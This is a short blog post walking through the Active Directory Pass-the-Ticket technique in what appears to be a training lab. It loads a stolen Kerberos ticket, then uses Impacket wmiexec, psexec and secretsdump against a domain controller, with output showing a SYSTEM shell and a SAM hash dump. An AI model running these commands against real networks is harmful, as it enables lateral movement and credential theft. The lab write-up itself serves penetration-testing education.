June 2, 2026
Active Directory Attacks — Pass The Ticket
Pass-the-Ticket is a post-exploitation technique in Active Directory where an attacker uses a stolen Kerberos ticket (usually a TGT or TGS)…
Osec
1 min read
Pass-the-Ticket is a post-exploitation technique in Active Directory where an attacker uses a stolen Kerberos ticket (usually a TGT or TGS) to authenticate as a user without knowing their password or NTLM hash.
Instead of stealing credentials, you steal the authentication token itself (the Kerberos ticket) and reuse it.
Attack
- You obtain a Kerberos ticket ( TGT / TGS )
- load/inject it into your session
- authenticate to services without credentials in an Active Directory environment.
for the demo let's say you obtained a kerberos ticket for the user BRoss ( e.g: via overpass the hash attack )
Tell Linux to use that ticket ( load that ticket ) :
export KRB5CCNAME=/tmp/BRoss.ccacheexport KRB5CCNAME=/tmp/BRoss.ccacheuse the ticket:
wmiexec:
impacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\brossimpacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\brosspsexec:
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file jiWPllnH.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service OydR on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service OydR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemimpacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file jiWPllnH.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service OydR on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service OydR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemimpacket-secretsdump:
impacket-secretsdump -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...impacket-secretsdump -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...subscribe to get notified whenever a new article is published !
Follow me on X : https://x.com/osec403